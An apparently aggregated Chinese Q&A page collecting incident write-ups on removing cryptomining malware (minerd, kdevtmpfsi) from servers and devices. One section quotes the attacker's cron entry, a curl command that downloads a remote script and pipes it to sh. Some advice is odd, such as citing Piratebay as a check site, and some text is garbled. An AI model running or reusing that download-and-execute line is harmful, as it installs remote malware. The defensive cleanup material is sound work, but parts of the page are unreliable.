怎么消除挖矿程序

❶ 如何清理手机挖矿程序

手机彻底恢复成出场模式，清理掉所有安装消耗手机性能的东西。

❷ 怎样 删除 mineros.exe 这种挖矿程序

最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用情况如下：

让后登录到服务器，利用top查看CPU使用情况，这个叫minerd的程序消耗cpu较大，如下图所示：

这个程序并不是我们的正常服务程序，心里一想肯定被黑了，然后就搜索了一下这个程序，果真就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工作的，然后怎么修复一下后门。

这个程序放在/opt/minerd下，在确定跟项目不相关的情况下判断是个木马程序，果断kill掉进程，然后删除/opt下minerd文件。

展

❸ tasklsv.exe挖矿病毒如何彻底清除

请勿访问陌生网站，在陌生网站浏览、下载很可能导致中毒。

1. 若电脑中存在木马或者病毒程序，安装一款安全软件（例如：电脑管家等）。使用安全软件进行扫描全盘即可发现病毒并删除。若无法处理或者出现错误请尝试备份重要资料后重新安装系统。

2. 若手机中存在木马或者病毒程序，安装一款安全软件（例如：手机管家等）。以手机管家为例，打开手机管家，点击主界面上的一键体检即可自动检测手机中存在的病毒，点击一键清除即可删除。

❹ 手机被挖矿怎么办

可以使用设备访问检测网站（例如 Piratebay）来确认其安全性。

虽然 Chrome 是最常用的浏览器，但是 Opera 浏览器提供了一些 Chrome 没有的有趣功能。最新版本的 Opera 浏览器能够自动拦截广告，此外，它还内置了阻止挖矿的防护功能。这一功能可以阻止网站擅自运行非法挖矿的脚本，这与网页上的广告拦截技术并没有太大区别。

相关信息：

“偷矿”是指未经你同意的情况下，黑客利用你的系统资源挖掘虚拟货币。这主要借助于网站的 Java 代码，黑客在代码中注入“偷矿”程序，当你访问这些代码时，“偷矿”程序便会偷偷自动运行。

虽然黑客能够主动入侵网站来运行挖矿脚本，但需要注意的是，那些使用了类似 Coinhive.com 这种插件服务的网站无意中也会给黑客提供更多的可乘之机。

❺ IP地址被疑挖矿怎么办

1、首先使用find命令在IP地址中找到kdevtmpfsi进程的位置。
2、其次利用这个进程找到挖矿程序的守护进程并kill它，删除守护进程的文件，删除挖矿程序的所有文件。
3、最后杀死挖矿进程并删除它的定时任务即可。

❻ 服务器被检测出挖矿

有位朋友说，他服务器使用的好好的，服务商突然封了他服务器，说是被检测出挖矿，这位朋友一脸懵“我开游戏的，挖什么矿”。突然地关停服务器导致这位朋友损失惨重，那么为什么会被检测出挖矿，以及怎么处理呢？感兴趣的话就继续往下看吧~

遇到以上问题，需要先找服务器商对其说明实际情况，配合他们排查，基本上就是中了挖矿病毒。

最简单的方法就是重装系统，但是系统盘数据都会清空，这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统，需要把自己的文件扫毒一遍确认安全后再导入服务器。

但是服务器里如果有很多重要的文件还有比较难配置的环境，那就需要排查删除挖矿程序，全盘扫毒，删除可疑文件，一个个修复病毒对系统的修改。

防范建议：

1.尽量不要使用默认密码和端口，改一个比较复杂的密码

2.可以使用宝塔面板登陆服务器

3.系统自带的防火墙、安全防护都不要关闭

❼ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

❽ 记一次清理服务器挖矿程序注入kdevtmpfs

前几天突然发现公司服务器很卡，CPU经常飙到200%；网站服务被自动停止，甚至服务器崩溃；于是进行排查，发现一个名为：kdevtmpfs的进程占用了180%多的CPU，吓了一跳，于是赶紧排查问题：首先查到这个进程并不少我们服务器用到的进程，于是在网上查找这个问题，发现很多人都遇到过，于是根据网上的一个教程开始清理：

1、删除掉/tmp文件下的kdevtmpfs文件；删除掉kdevtmpfs对应的进程，清理掉定时任务；（无效，几分钟后依然会自动重启，自动在定时任务新增定时任务）（ https://blog.csdn.net/qq503758762/article/details/103714342 ）

2、修改定时任务，不允许新增定时任务，复述1的步骤；（哗枝无效，依然会自动重新启动）；

3、经历上述两个方法都无效之后，做了以下操作：a、先用top命令查看进程号；b、根据systemctl status进程号命令，查看该进程对应的父进程；把对应进程下的程序都干掉；重复几次发现都是一个叫做kingsfdt的进程会和这个kdevtmpfs同时启动；c、查看kingsfdt的进程，乱旅敏发现这也是一个陌生的进程，先不kill掉;d:查看系统防火墙，发现对应的23549端口不知道什么时候开放的，并且对应的是kingsfdt这个进程，于是果断把这个进程干掉，同时把端口号封掉；e、再回头删除tmp下的kdevtmpfs文件，再依次删除两个陌生进程；f、登录AWS控制台，把ssh端口改掉，22端口封掉；进入ssh修改root密码，设定只镇和能本地登录；重启服务器；观察了一天，发现服务稳定了，系统也正常运行了，CPU也正常了。开心。

❾ 服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马

MongoDB库中的数据莫名其妙没有了，发觉如下信息：

1、 top -d 5命令 ，查看系统负载情况、是否有未知进程，发现一个名为kdevtmpfsi的进程，经科普它是一个挖矿程序，会占用服务器高额的CPU、内存资源。如图，CPU占用率高达788.7%，而且是yarn用户下：

2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径：/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息（此时我的服务器并没有开启yarn服务，如果有yarn的相关进程则可判断是攻击者开启的进程），发现另外还有个kinsing进程，经科普kinsing进程是kdevtmpfsi的守护进程：

4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip，判断是kdevtmpfsi的发出者：

5、经查询该ip的所在国家是俄罗斯：

6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除：

7、 cd /tmp 进入相关目录：

8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序：

9、** kill -9 40422**杀掉kdevtmpfsi进程：

10、发现并没杀掉所有kdevtmpfsi进程，再次查找yarn的相关进程（因为之前已确认病毒是在yarn下），果真还有kdevtmpfsi进程存在：

11、用命令 批量杀掉 相关进程：

12、删除kinsing文件：

13、现在，已经把挖矿程序及相关进程删除掉了，但是还有两处没做处理：

14、 crontab -l 命令先看看crontab的定时任务列表吧：

15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh ：

16、新增 定时任务 并删除攻击者的挖矿定时任务：

17、 crontab -l命令 查看现在只有杀进程的定时任务了：

18、禁止黑客的IP地址。

最初安装MongoDB时，并未设置密码认证，存在漏洞，导致黑客通过漏洞攻击服务器，并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的，治标不治本，应该定时删除病毒进程，禁止攻击者IP，重新安装系统或相关软件。

经过几天的观察，服务器运行正常，再没有被黑客攻击成功。

❿ 挖矿病毒怎么处理

挖矿病毒处理步骤如下：

1、查看服务器进程运行状态查看服务器系统整体运行情况，发现名为kdevtmpfsi的挖矿进程大量占用系统CPU使用率。

2、查看端口及外联情况查看端口开放状态及外联情况，发现主机存在陌生外联行为。对该外部地址进行查询发现属于国外地址，进一步确定该进程为恶意挖矿进程：定位挖矿进程及其守护进程PID挖矿病毒kdevtmpfsi在运行过程中不仅会产生进程kdevtmpfsi。

6、查看redis日志通过查看redis配置文件/etc/redis.conf发现日志功能未开启。

7、查找敏感文件发现authorized_keys文件。

8、查看ssh日志文件查看ssh日志文件，发现大量登陆痕迹以及公钥上传痕迹。